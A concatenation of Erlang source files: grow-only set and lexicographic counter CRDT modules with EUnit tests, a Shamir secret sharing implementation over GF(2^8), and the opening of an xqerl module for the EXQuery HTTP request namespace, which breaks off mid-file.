    state_type:is_strict_inflation(CRDT1, CRDT2);
%% @todo get back here later
is_strict_inflation({cardinality, Value1}, {?TYPE, _}=GSet) ->
    Value2 = query(GSet),
    sets:size(Value2) > Value1.
%% @doc Check for irreducible strict inflation.
%%      A singleton delta strictly inflates a digested state iff its
%%      element is not already in that state.
-spec irreducible_is_strict_inflation(state_gset(),
                                      state_type:digest()) ->
    boolean().
irreducible_is_strict_inflation({?TYPE, [E]},
                                {state, {?TYPE, GSet}}) ->
    not ordsets:is_element(E, GSet).
%% The digest of a GSet is the full state itself.
-spec digest(state_gset()) -> state_type:digest().
digest({?TYPE, _}=CRDT) ->
    {state, CRDT}.
%% @doc Join decomposition for `state_gset()'.
%%      Partitions the set into singleton `state_gset()'s, one per
%%      element; joining them back reproduces the original set. Elements
%%      are emitted in reverse ordset order.
-spec join_decomposition(state_gset()) -> [state_gset()].
join_decomposition({?TYPE, GSet}) ->
    lists:reverse([{?TYPE, [Elem]} || Elem <- GSet]).
%% @doc Delta calculation for `state_gset()', delegated to the generic
%%      state_type implementation (state minus digest).
-spec delta(state_gset(), state_type:digest()) -> state_gset().
delta({?TYPE, _}=A, B) ->
    state_type:delta(A, B).
%% Serialize a GSet with the Erlang external term format.
-spec encode(state_type:format(), state_gset()) -> binary().
encode(erlang, {?TYPE, _}=CRDT) ->
    erlang:term_to_binary(CRDT).
%% Deserialize; the match on {?TYPE, _} rejects foreign terms.
%% NOTE(review): binary_to_term/1 without the `safe' option must only be
%% fed trusted (intra-cluster) binaries — confirm callers.
-spec decode(state_type:format(), binary()) -> state_gset().
decode(erlang, Binary) ->
    {?TYPE, _} = CRDT = erlang:binary_to_term(Binary),
    CRDT.
%% ===================================================================
%% EUnit tests
%% ===================================================================
-ifdef(TEST).
%% EUnit coverage for the GSet lattice operations: constructors,
%% mutation (direct and delta-based), merge laws (idempotence,
%% commutativity, delta grouping), order predicates, decomposition and
%% the codec round-trip.
new_test() ->
    ?assertEqual({?TYPE, ordsets:new()}, new()).
query_test() ->
    Set0 = new(),
    Set1 = {?TYPE, [<<"a">>]},
    ?assertEqual(sets:new(), query(Set0)),
    ?assertEqual(sets:from_list([<<"a">>]), query(Set1)).
delta_add_test() ->
    Actor = 1,
    Set0 = new(),
    {ok, {?TYPE, Delta1}} = delta_mutate({add, <<"a">>}, Actor, Set0),
    Set1 = merge({?TYPE, Delta1}, Set0),
    {ok, {?TYPE, Delta2}} = delta_mutate({add, <<"a">>}, Actor, Set1),
    Set2 = merge({?TYPE, Delta2}, Set1),
    {ok, {?TYPE, Delta3}} = delta_mutate({add, <<"b">>}, Actor, Set2),
    Set3 = merge({?TYPE, Delta3}, Set2),
    %% re-adding an element yields an empty delta (Delta2).
    ?assertEqual({?TYPE, [<<"a">>]}, {?TYPE, Delta1}),
    ?assertEqual({?TYPE, [<<"a">>]}, Set1),
    ?assertEqual({?TYPE, []}, {?TYPE, Delta2}),
    ?assertEqual({?TYPE, [<<"a">>]}, Set2),
    ?assertEqual({?TYPE, [<<"b">>]}, {?TYPE, Delta3}),
    ?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set3).
add_test() ->
    Actor = 1,
    Set0 = new(),
    {ok, Set1} = mutate({add, <<"a">>}, Actor, Set0),
    {ok, Set2} = mutate({add, <<"b">>}, Actor, Set1),
    ?assertEqual({?TYPE, [<<"a">>]}, Set1),
    ?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set2).
merge_idempotent_test() ->
    Set1 = {?TYPE, [<<"a">>]},
    Set2 = {?TYPE, [<<"a">>, <<"b">>]},
    Set3 = merge(Set1, Set1),
    Set4 = merge(Set2, Set2),
    ?assertEqual(Set1, Set3),
    ?assertEqual(Set2, Set4).
merge_commutative_test() ->
    Set1 = {?TYPE, [<<"a">>]},
    Set2 = {?TYPE, [<<"a">>, <<"b">>]},
    Set3 = merge(Set1, Set2),
    Set4 = merge(Set2, Set1),
    ?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set3),
    ?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set4).
merge_deltas_test() ->
    Set1 = {?TYPE, [<<"a">>]},
    Delta1 = {?TYPE, [<<"a">>, <<"b">>]},
    Delta2 = {?TYPE, [<<"c">>]},
    Set2 = merge(Delta1, Set1),
    Set3 = merge(Set1, Delta1),
    DeltaGroup = merge(Delta1, Delta2),
    ?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set2),
    ?assertEqual({?TYPE, [<<"a">>, <<"b">>]}, Set3),
    ?assertEqual({?TYPE, [<<"a">>, <<"b">>, <<"c">>]}, DeltaGroup).
equal_test() ->
    Set1 = {?TYPE, [<<"a">>]},
    Set2 = {?TYPE, [<<"a">>, <<"b">>]},
    ?assert(equal(Set1, Set1)),
    ?assertNot(equal(Set1, Set2)).
is_bottom_test() ->
    Set0 = new(),
    Set1 = {?TYPE, [<<"a">>]},
    ?assert(is_bottom(Set0)),
    ?assertNot(is_bottom(Set1)).
is_inflation_test() ->
    Set1 = {?TYPE, [<<"a">>]},
    Set2 = {?TYPE, [<<"a">>, <<"b">>]},
    ?assert(is_inflation(Set1, Set1)),
    ?assert(is_inflation(Set1, Set2)),
    ?assertNot(is_inflation(Set2, Set1)),
    %% check inflation with merge
    ?assert(state_type:is_inflation(Set1, Set1)),
    ?assert(state_type:is_inflation(Set1, Set2)),
    ?assertNot(state_type:is_inflation(Set2, Set1)).
is_strict_inflation_test() ->
    Set1 = {?TYPE, [<<"a">>]},
    Set2 = {?TYPE, [<<"a">>, <<"b">>]},
    ?assertNot(is_strict_inflation(Set1, Set1)),
    ?assert(is_strict_inflation(Set1, Set2)),
    ?assertNot(is_strict_inflation(Set2, Set1)).
join_decomposition_test() ->
    %% decomposition order is unspecified, hence the sort.
    Set1 = {?TYPE, [<<"a">>]},
    Set2 = {?TYPE, [<<"a">>, <<"b">>]},
    Decomp1 = join_decomposition(Set1),
    Decomp2 = join_decomposition(Set2),
    ?assertEqual([{?TYPE, [<<"a">>]}], Decomp1),
    ?assertEqual(lists:sort([{?TYPE, [<<"a">>]}, {?TYPE, [<<"b">>]}]), lists:sort(Decomp2)).
delta_test() ->
    A = {?TYPE, ["a", "b", "c"]},
    B = {state, {?TYPE, ["b", "d"]}},
    Delta = delta(A, B),
    ?assertEqual({?TYPE, ["a", "c"]}, Delta).
encode_decode_test() ->
    Set = {?TYPE, [<<"a">>, <<"b">>]},
    Binary = encode(erlang, Set),
    ESet = decode(erlang, Binary),
    ?assertEqual(Set, ESet).
-endif.
%% From: https://github.com/rnewson/shamir/tree/master/src/shamir.erl
%% Copyright 2011 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(shamir).
-export([share/3, recover/1]).
-include("shamir.hrl").
%% Split Secret (a binary, a list of bytes, or a single byte 0..255)
%% into Count shares, any Threshold of which reconstruct the secret.
%% For a single byte, a degree Threshold-1 polynomial over GF(2^8) is
%% built with random coefficients and the secret as constant term; each
%% share is the polynomial evaluated at X = 1..Count. Multi-byte secrets
%% are shared byte-wise and the per-byte shares transposed into one
%% #share{} record per X.
share(Secret, Threshold, Count) when is_binary(Secret) ->
  share(binary_to_list(Secret), Threshold, Count);
share(Secret, Threshold, Count) when is_list(Secret) ->
  Shares = transpose([share(Byte, Threshold, Count) || Byte <- Secret]),
  [#share{threshold=Threshold, x=X, y=list_to_binary(lists:nth(X, Shares))}
   || X <- lists:seq(1, Count)];
share(Secret, Threshold, Count) when (Secret >= 0 andalso Secret =< 255) ->
  GF = galois:generate(8),
  %% crypto:rand_bytes/1 was removed in OTP 20; strong_rand_bytes/1 is
  %% the supported replacement and provides the cryptographically strong
  %% randomness that Shamir coefficients require.
  Coeffs = binary_to_list(crypto:strong_rand_bytes(Threshold - 1)) ++ [Secret],
  [horner(GF, X, Coeffs) || X <- lists:seq(1, Count)].
%% Evaluate the polynomial with coefficients Coeffs (highest degree
%% first, secret byte last) at X over the Galois field GF, using
%% Horner's rule: Acc := Acc*X + Coeff.
horner(GF, X, Coeffs) ->
  horner(GF, X, Coeffs, 0).
horner(_, _, [], Acc) ->
  Acc;
horner(GF, X, [Coeff|Rest], Acc) ->
  Mult = galois:multiply(GF, Acc, X),
  Add = galois:add(GF, Mult, Coeff),
  horner(GF, X, Rest, Add).
%% Recombine shares into the secret binary. The threshold is taken from
%% the first share; duplicate x coordinates are dropped (ukeysort) and
%% each byte position is interpolated independently.
recover([#share{threshold=Threshold}|_]=Shares0) ->
  Shares = lists:ukeysort(#share.x, Shares0),
  X = [X || #share{x=X} <- Shares],
  Ys = transpose(lists:map(fun(#share{y=Y}) ->
    binary_to_list(Y) end, Shares)),
  list_to_binary([recover(Threshold, Z) || Z <- [lists:zip(X, Y) || Y <- Ys]]).
%% Interpolate one byte from at least Threshold {X, Y} points; only the
%% first Threshold points are used.
recover(Threshold, Shares) when length(Shares) >= Threshold ->
  lagrange(lists:sublist(Shares, Threshold)).
%% Lagrange interpolation at x = 0 over GF: the sum of each share's Y
%% scaled by its basis polynomial yields the polynomial's constant term,
%% i.e. the secret byte.
lagrange(Shares) ->
  GF = galois:generate(8),
  lists:foldl(fun(Share, Acc) ->
    galois:add(GF, lagrange(GF, Share, Shares), Acc) end,
    0, Shares).
lagrange(GF, Share, Shares) ->
  lagrange(GF, Share, Shares, 1).
%% Accumulate the basis product for one share, skipping the share's own
%% x coordinate (second clause).
lagrange(GF, {_, Y}, [], Acc) ->
  galois:multiply(GF, Y, Acc);
lagrange(GF, {X, Y}, [{X, _} | Rest], Acc) ->
  lagrange(GF, {X, Y}, Rest, Acc);
lagrange(GF, {X1, Y1}, [{X2, _} | Rest], Acc) ->
  lagrange(GF, {X1, Y1}, Rest,
    galois:multiply(GF, Acc,
      galois:divide(GF, X2,
        galois:subtract(GF, X1, X2)))).
% Transpose a list of rows into a list of columns. Rows may be ragged:
% a row that runs out of elements simply stops contributing to later
% columns (empty rows are dropped as they are reached).
transpose([[Head | RowRest] | Rows]) ->
  Firsts = [F || [F | _] <- Rows],
  Rests = [R || [_ | R] <- Rows],
  [[Head | Firsts] | transpose([RowRest | Rests])];
transpose([[] | Rows]) ->
  transpose(Rows);
transpose([]) ->
  [].
%%
%% Copyright (c) 2015-2016 <NAME>. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%% @doc Lexicographic Counter.
%%
%% @reference <NAME>, <NAME>, and <NAME>
%% Delta State Replicated Data Types (2016)
%% [http://arxiv.org/pdf/1603.01529v1.pdf]
%%
%% @reference <NAME>
%% delta-enabled-crdts C++ library
%% [https://github.com/CBaquero/delta-enabled-crdts]
-module(state_lexcounter).
-author("<NAME> <<EMAIL>>").
-behaviour(type).
-behaviour(state_type).
-define(TYPE, ?MODULE).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([new/0, new/1]).
-export([mutate/3, delta_mutate/3, merge/2]).
-export([query/1, equal/2, is_bottom/1, is_inflation/2, is_strict_inflation/2, irreducible_is_strict_inflation/2]).
-export([join_decomposition/1, delta/3]).
-export([encode/2, decode/2]).
-export_type([state_lexcounter/0, state_lexcounter_op/0]).
-opaque state_lexcounter() :: {?TYPE, payload()}.
-type payload() :: orddict:orddict().
-type state_lexcounter_op() :: increment | decrement.
%% @doc Create a new, empty `state_lexcounter()'
-spec new() -> state_lexcounter().
new() ->
    {?TYPE, orddict:new()}.
%% @doc Create a new, empty `state_lexcounter()'
%%      Only the empty argument list is accepted (the state_type
%%      constructor convention); LexCounters take no arguments.
-spec new([term()]) -> state_lexcounter().
new([]) ->
    new().
%% @doc Mutate a `state_lexcounter()'.
%%      Delegates to state_type:mutate/3, which composes
%%      delta_mutate/3 with merge/2.
-spec mutate(state_lexcounter_op(), type:id(), state_lexcounter()) ->
    {ok, state_lexcounter()}.
mutate(Op, Actor, {?TYPE, _LexCounter}=CRDT) ->
    state_type:mutate(Op, Actor, CRDT).
%% @doc Delta-mutate a `state_lexcounter()'.
%%      `increment' bumps the right (payload) component of the actor's
%%      lexicographic pair. `decrement' bumps the left component while
%%      decreasing the right one; join/2 prefers the pair with the
%%      larger left component, which is what makes the decrement stick.
%%      The returned delta is a single-entry `state_lexcounter()' for
%%      `Actor'; the input CRDT itself is not modified.
-spec delta_mutate(state_lexcounter_op(), type:id(), state_lexcounter()) ->
    {ok, state_lexcounter()}.
delta_mutate(increment, Actor, {?TYPE, LexCounter}) ->
    {Left, Right} = actor_pair(Actor, LexCounter),
    Delta = orddict:store(Actor, {Left, Right + 1}, orddict:new()),
    {ok, {?TYPE, Delta}};
delta_mutate(decrement, Actor, {?TYPE, LexCounter}) ->
    {Left, Right} = actor_pair(Actor, LexCounter),
    Delta = orddict:store(Actor, {Left + 1, Right - 1}, orddict:new()),
    {ok, {?TYPE, Delta}}.

%% @private Current lexicographic pair for `Actor', defaulting to {0, 0}
%% when the actor has no entry yet. Shared by both delta_mutate/3
%% clauses to avoid duplicating the lookup.
actor_pair(Actor, LexCounter) ->
    case orddict:find(Actor, LexCounter) of
        {ok, Pair} ->
            Pair;
        error ->
            {0, 0}
    end.
%% @doc Returns the value of the `state_lexcounter()'.
%%      A `state_lexcounter()' maps actors to {Left, Right} pairs; the
%%      counter value is the sum of the Right components.
%%      Since decrement stores Right - 1, both individual components and
%%      the total can be negative, so the return type is integer()
%%      (the spec previously over-promised non_neg_integer()).
-spec query(state_lexcounter()) -> integer().
query({?TYPE, LexCounter}) ->
    lists:sum([ Right || {_Actor, {_Left, Right}} <- LexCounter ]).
%% @doc Merge two `state_lexcounter()'.
%%      The keys of the resulting `state_lexcounter()' are the union of the
%%      keys of both `state_lexcounter()' passed as input.
%%      If a key is only present on one of the `state_lexcounter()',
%%      its correspondent lexicographic pair is preserved.
%%      If a key is present in both `state_lexcounter()', the new value
%%      will be the join of the lexicographic pairs (see join/2).
-spec merge(state_lexcounter(), state_lexcounter()) -> state_lexcounter().
merge({?TYPE, _}=CRDT1, {?TYPE, _}=CRDT2) ->
    %% The per-key merge is handed to the generic state_type:merge/3.
    MergeFun = fun({?TYPE, LexCounter1}, {?TYPE, LexCounter2}) ->
        LexCounter = orddict:merge(
            fun(_, Value1, Value2) ->
                join(Value1, Value2)
            end,
            LexCounter1,
            LexCounter2
        ),
        {?TYPE, LexCounter}
    end,
    state_type:merge(CRDT1, CRDT2, MergeFun).
%% @private Lexicographic join of two {Left, Right} pairs: the pair with
%% the strictly larger left component wins outright; on equal left
%% components the right components are joined with max/2.
%% NOTE(review): the final branch looks unreachable for ordinary terms,
%% since >, < and == form a total order — kept for parity.
join({L1, R1} = First, {L2, R2} = Second) ->
    if
        L1 > L2 -> First;
        L2 > L1 -> Second;
        L1 == L2 -> {L1, max(R1, R2)};
        true -> {max(L1, L2), 0}
    end.
%% @doc Equality for `state_lexcounter()': same keys, and component-wise
%%      equal pairs.
-spec equal(state_lexcounter(), state_lexcounter()) -> boolean().
equal({?TYPE, LexCounter1}, {?TYPE, LexCounter2}) ->
    Fun = fun({Left1, Right1}, {Left2, Right2}) -> Left1 == Left2 andalso Right1 == Right2 end,
    orddict_ext:equal(LexCounter1, LexCounter2, Fun).
%% @doc Check if a LexCounter is bottom (no actor entries).
-spec is_bottom(state_lexcounter()) -> boolean().
is_bottom({?TYPE, LexCounter}) ->
    orddict:is_empty(LexCounter).
%% @doc Given two `state_lexcounter()', check if the second is an
%%      inflation of the first.
%%      We have an inflation if, for every key present in the first
%%      `state_lexcounter()', that key is also in the second and,
%%      the correspondent lexicographic pair in the second
%%      `state_lexcounter()' is an inflation of the lexicographic pair
%%      associated to the same key in the first `state_lexcounter()'.
%%      A lexicographic pair P1 is an inflation of a lexicographic
%%      pair P2 if one of the following:
%%          - the first component of P2 is an inflation of the first
%%          component of P1
%%          - their first components are equal and the second component
%%          of P2 is an inflation of the second component of P1
-spec is_inflation(state_lexcounter(), state_lexcounter()) -> boolean().
is_inflation({?TYPE, LexCounter1}, {?TYPE, LexCounter2}) ->
    LexPairInflation = fun({Left1, Right1}, {Left2, Right2}) ->
        (Left2 > Left1)
        orelse
        (Left1 == Left2 andalso Right2 >= Right1)
    end,
    %% short-circuits on the first key that is missing or not inflated.
    lists_ext:iterate_until(
        fun({Key, Value1}) ->
            case orddict:find(Key, LexCounter2) of
                {ok, Value2} ->
                    LexPairInflation(Value1, Value2);
                error ->
                    false
            end
        end,
        LexCounter1
    ).
%% @doc Check for strict inflation (inflation and not equal), delegated
%%      to the generic state_type implementation.
-spec is_strict_inflation(state_lexcounter(), state_lexcounter()) -> boolean().
is_strict_inflation({?TYPE, _}=CRDT1, {?TYPE, _}=CRDT2) ->
    state_type:is_strict_inflation(CRDT1, CRDT2).
%% @doc Check for irreducible strict inflation, delegated to the generic
%%      state_type implementation.
-spec irreducible_is_strict_inflation(state_lexcounter(), state_lexcounter()) ->
    boolean().
irreducible_is_strict_inflation({?TYPE, _}=Irreducible, {?TYPE, _}=CRDT) ->
    state_type:irreducible_is_strict_inflation(Irreducible, CRDT).
%% @doc Join decomposition for `state_lexcounter()'.
%% @todo currently trivial: the whole state as a single irreducible.
-spec join_decomposition(state_lexcounter()) -> [state_lexcounter()].
join_decomposition({?TYPE, _}=CRDT) ->
    [CRDT].
%% @doc Delta calculation for `state_lexcounter()', delegated to the
%%      generic state_type implementation.
-spec delta(state_type:delta_method(), state_lexcounter(), state_lexcounter()) ->
    state_lexcounter().
delta(Method, {?TYPE, _}=A, {?TYPE, _}=B) ->
    state_type:delta(Method, A, B).
%% Serialize a LexCounter with the Erlang external term format.
-spec encode(state_type:format(), state_lexcounter()) -> binary().
encode(erlang, {?TYPE, _}=CRDT) ->
    erlang:term_to_binary(CRDT).
%% Deserialize; the match on {?TYPE, _} rejects foreign terms.
%% NOTE(review): binary_to_term/1 without the `safe' option must only be
%% fed trusted (intra-cluster) binaries — confirm callers.
-spec decode(state_type:format(), binary()) -> state_lexcounter().
decode(erlang, Binary) ->
    {?TYPE, _} = CRDT = erlang:binary_to_term(Binary),
    CRDT.
%% ===================================================================
%% EUnit tests
%% ===================================================================
-ifdef(TEST).
%% EUnit coverage for the LexCounter: constructors, query, delta and
%% direct mutation, join-based merge (decrement with larger Left wins),
%% equality, order predicates and the codec round-trip.
new_test() ->
    ?assertEqual({?TYPE, []}, new()).
query_test() ->
    Counter0 = new(),
    Counter1 = {?TYPE, [{1, {1, 2}}, {2, {1, 13}}, {3, {1, 2}}]},
    ?assertEqual(0, query(Counter0)),
    ?assertEqual(17, query(Counter1)).
delta_test() ->
    Counter0 = new(),
    {ok, {?TYPE, Delta1}} = delta_mutate(increment, 1, Counter0),
    Counter1 = merge({?TYPE, Delta1}, Counter0),
    {ok, {?TYPE, Delta2}} = delta_mutate(decrement, 2, Counter1),
    Counter2 = merge({?TYPE, Delta2}, Counter1),
    {ok, {?TYPE, Delta3}} = delta_mutate(increment, 1, Counter2),
    Counter3 = merge({?TYPE, Delta3}, Counter2),
    %% decrement produces {Left + 1, Right - 1} (Delta2).
    ?assertEqual({?TYPE, [{1, {0, 1}}]}, {?TYPE, Delta1}),
    ?assertEqual({?TYPE, [{1, {0, 1}}]}, Counter1),
    ?assertEqual({?TYPE, [{2, {1, -1}}]}, {?TYPE, Delta2}),
    ?assertEqual({?TYPE, [{1, {0, 1}}, {2, {1, -1}}]}, Counter2),
    ?assertEqual({?TYPE, [{1, {0, 2}}]}, {?TYPE, Delta3}),
    ?assertEqual({?TYPE, [{1, {0, 2}}, {2, {1, -1}}]}, Counter3).
increment_test() ->
    Counter0 = new(),
    {ok, Counter1} = mutate(increment, 1, Counter0),
    {ok, Counter2} = mutate(decrement, 2, Counter1),
    {ok, Counter3} = mutate(increment, 1, Counter2),
    ?assertEqual({?TYPE, [{1, {0, 1}}]}, Counter1),
    ?assertEqual({?TYPE, [{1, {0, 1}}, {2, {1, -1}}]}, Counter2),
    ?assertEqual({?TYPE, [{1, {0, 2}}, {2, {1, -1}}]}, Counter3).
merge_test() ->
    %% the pair with the larger Left component always wins the join.
    Counter1 = {?TYPE, [{<<"5">>, {6, 2}}]},
    Counter2 = {?TYPE, [{<<"5">>, {5, 3}}]},
    Counter3 = {?TYPE, [{<<"5">>, {5, 10}}]},
    Counter4 = merge(Counter1, Counter1),
    Counter5 = merge(Counter1, Counter2),
    Counter6 = merge(Counter2, Counter1),
    Counter7 = merge(Counter2, Counter3),
    ?assertEqual({?TYPE, [{<<"5">>, {6, 2}}]}, Counter4),
    ?assertEqual({?TYPE, [{<<"5">>, {6, 2}}]}, Counter5),
    ?assertEqual({?TYPE, [{<<"5">>, {6, 2}}]}, Counter6),
    ?assertEqual({?TYPE, [{<<"5">>, {5, 10}}]}, Counter7).
merge_delta_test() ->
    Counter1 = {?TYPE, [{<<"1">>, {2, 3}}, {<<"2">>, {5, 2}}]},
    Delta1 = {?TYPE, [{<<"1">>, {2, 4}}]},
    Delta2 = {?TYPE, [{<<"3">>, {1, 2}}]},
    Counter2 = merge(Delta1, Counter1),
    Counter3 = merge(Counter1, Delta1),
    DeltaGroup = merge(Delta1, Delta2),
    ?assertEqual({?TYPE, [{<<"1">>, {2, 4}}, {<<"2">>, {5, 2}}]}, Counter2),
    ?assertEqual({?TYPE, [{<<"1">>, {2, 4}}, {<<"2">>, {5, 2}}]}, Counter3),
    ?assertEqual({?TYPE, [{<<"1">>, {2, 4}}, {<<"3">>, {1, 2}}]}, DeltaGroup).
equal_test() ->
    Counter1 = {?TYPE, [{1, {2, 0}}, {2, {1, 2}}, {4, {1, 2}}]},
    Counter2 = {?TYPE, [{1, {2, 0}}, {2, {1, 2}}, {4, {1, 2}}, {5, {6, 3}}]},
    Counter3 = {?TYPE, [{1, {2, 0}}, {2, {2, 2}}, {4, {1, 2}}]},
    Counter4 = {?TYPE, [{1, {2, 1}}, {2, {1, 2}}, {4, {1, 2}}]},
    ?assert(equal(Counter1, Counter1)),
    ?assertNot(equal(Counter1, Counter2)),
    ?assertNot(equal(Counter1, Counter3)),
    ?assertNot(equal(Counter1, Counter4)).
is_bottom_test() ->
    Counter0 = new(),
    Counter1 = {?TYPE, [{1, {2, 0}}, {2, {1, 2}}, {4, {1, 2}}]},
    ?assert(is_bottom(Counter0)),
    ?assertNot(is_bottom(Counter1)).
is_inflation_test() ->
    Counter1 = {?TYPE, [{<<"1">>, {2, 0}}]},
    Counter2 = {?TYPE, [{<<"1">>, {2, 0}}, {<<"2">>, {1, -1}}]},
    Counter3 = {?TYPE, [{<<"1">>, {2, 1}}]},
    Counter4 = {?TYPE, [{<<"1">>, {3, -2}}]},
    Counter5 = {?TYPE, [{<<"1">>, {2, -1}}]},
    ?assert(is_inflation(Counter1, Counter1)),
    ?assert(is_inflation(Counter1, Counter2)),
    ?assertNot(is_inflation(Counter2, Counter1)),
    ?assert(is_inflation(Counter1, Counter3)),
    ?assert(is_inflation(Counter1, Counter4)),
    ?assertNot(is_inflation(Counter1, Counter5)),
    %% check inflation with merge
    ?assert(state_type:is_inflation(Counter1, Counter1)),
    ?assert(state_type:is_inflation(Counter1, Counter2)),
    ?assertNot(state_type:is_inflation(Counter2, Counter1)),
    ?assert(state_type:is_inflation(Counter1, Counter3)),
    ?assert(state_type:is_inflation(Counter1, Counter4)),
    ?assertNot(state_type:is_inflation(Counter1, Counter5)).
is_strict_inflation_test() ->
    Counter1 = {?TYPE, [{<<"1">>, {2, 0}}]},
    Counter2 = {?TYPE, [{<<"1">>, {2, 0}}, {<<"2">>, {1, -1}}]},
    Counter3 = {?TYPE, [{<<"1">>, {2, 1}}]},
    Counter4 = {?TYPE, [{<<"1">>, {3, -2}}]},
    Counter5 = {?TYPE, [{<<"1">>, {2, -1}}]},
    ?assertNot(is_strict_inflation(Counter1, Counter1)),
    ?assert(is_strict_inflation(Counter1, Counter2)),
    ?assertNot(is_strict_inflation(Counter2, Counter1)),
    ?assert(is_strict_inflation(Counter1, Counter3)),
    ?assert(is_strict_inflation(Counter1, Counter4)),
    ?assertNot(is_strict_inflation(Counter1, Counter5)).
join_decomposition_test() ->
    %% @todo
    ok.
encode_decode_test() ->
    Counter = {?TYPE, [{<<"1">>, {2, 0}}, {<<"2">>, {1, -1}}]},
    Binary = encode(erlang, Counter),
    ECounter = decode(erlang, Binary),
    ?assertEqual(Counter, ECounter).
-endif.
%% -------------------------------------------------------------------
%%
%% xqerl - XQuery processor
%%
%% Copyright (c) 2020 <NAME> All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%% @doc Implementation of the "http://exquery.org/ns/request" namespace.
-module(xqerl_mod_exquery_request).
-include("xqerl.hrl").
-include_lib("kernel/include/inet.hrl").
-define(NS, <<"http://exquery.org/ns/request">>).
-define(PX, <<"request">>).
-define(ERRNS, <<"http://exquery.org/ns/request/error">>).
-define(ERRPX, <<"reqerr">>).
-export([
address/1,
cookie/2, cookie/3,
cookie_names/1,
header/2, header/3,
header_names/1,
hostname/1,
method/1,
parameter/2, parameter/3,
parameter_names/1,
path/1,
port/1,
query/1,
remote_address/1,
remote_hostname/1,
remote_port/1,
scheme/1,
uri/1
]).
-'module-namespace'({?NS, ?PX}).
-namespaces([]).
-variables([]).
-functions([
{{qname, ?NS, ?PX, <<"address">>}, {seqType, 'xs:string', one}, [], {'address', 1}, 0, []},
{{qname, ?NS, ?PX, <<"cookie">>}, {seqType, 'xs:string', zero_or_one}, [], {'cookie', 2}, 1, [
{seqType, 'xs:string', one}
]},
{{qname, ?NS, ?PX, <<"cookie">>}, {seqType, 'xs:string', one}, [], {'cookie', 3}, 2, [
{seqType, 'xs:string', one},
{seqType, 'xs:string', one}
]},
{
{qname, ?NS, ?PX, <<"cookie-names">>},
{seqType, 'xs:string', zero_or_many},
[],
{'cookie_names', 1},
0,
[]
},
{{qname, ?NS, ?PX, <<"header">>}, {seqType, 'xs:string', zero_or_one}, [], {'header', 2}, 1, [
{seqType, 'xs:string', one}
]},
{{qname, ?NS, ?PX, <<"header">>}, {seqType, 'xs:string', one}, [], {'header', 3}, 2, [
{seqType, 'xs:string', one},
{seqType, 'xs:string', one}
]},
{
{qname, ?NS, ?PX, <<"header-names">>},
{seqType, 'xs:string', zero_or_many},
[],
{'header_names', 1},
0,
[]
},
{{qname, ?NS, ?PX, <<"hostname">>}, {seqType, 'xs:string', one}, [], {'hostname', 1}, 0, []},
{{qname, ?NS, ?PX, <<"method">>}, {seqType, 'xs:string', one}, [], {'method', 1}, 0, []},
{
{qname, ?NS, ?PX, <<"parameter">>},
{seqType, 'xs:string', zero_or_many},
[],
{'parameter', 2},
1,
[{seqType, 'xs:string', one}]
},
{
{qname, ?NS, ?PX, <<"parameter">>},
{seqType, 'xs:string', zero_or_many},
[],
{'parameter', 3},
2,
[{seqType, 'xs:string', one}, {seqType, 'xs:string', one}]
},
{
{qname, ?NS, ?PX, <<"parameter-names">>},
{seqType, 'xs:string', zero_or_many},
[],
{'parameter_names', 1},
0,
[]
},
{{qname, ?NS, ?PX, <<"path">>}, {seqType, 'xs:string', one}, [], {'path', 1}, 0, []},
{{qname, ?NS, ?PX, <<"port">>}, {seqType, 'xs:integer', one}, [], {'port', 1}, 0, []},
{{qname, ?NS, ?PX, <<"query">>}, {seqType, 'xs:string', zero_or_one}, [], {'query', 1}, 0, []},
{
{qname, ?NS, ?PX, <<"remote-address">>},
{seqType, 'xs:string', one},
[],
{'remote_address', 1},
0,
[]
},
{
{qname, ?NS, ?PX, <<"remote-hostname">>},
{seqType, 'xs:string', one},
[],
{'remote_hostname', 1},
0,
[]
},
{
{qname, ?NS, ?PX, <<"remote-port">>},
{seqType, 'xs:integer', one},
[],
{'remote_port', 1},
0,
[]
},
{{qname, ?NS, ?PX, <<"scheme">>}, {seqType, 'xs:string', one}, [], {'scheme', 1}, 0, []},
{{qname, ?NS, ?PX, <<"uri">>}, {seqType, 'xs:anyURI', one}, [], {'uri', 1}, 0, []}
]).
-define(URI(D), #xqAtomicValue{type = 'xs:anyURI', value = D}).
%% 3.2 General Functions
%% 3.2.1 request:method
%% request:method() as xs:string
%% Summary:
%% This function returns the Method of the HTTP Request. The returned value
%% SHOULD be a valid HTTP 1.1 Method, which is expressed in upper-case, and
%% is one of the constants "OPTIONS", "GET", "POST", "PUT", "DELETE", "TRACE"
%% or "CONNECT". Implementations are free to return other method names as long
%% as the protocol builds on top of HTTP 1.1.
%% Like every function in this module, throws reqerr:REDY0001 (see
%% no_context_error/0) when the context map carries no restxq_ctx key.
method(#{restxq_ctx := Req}) ->
cowboy_req:method(Req);
method(_) ->
no_context_error().
%% 3.3 URI Functions
%% 3.3.1 request:scheme
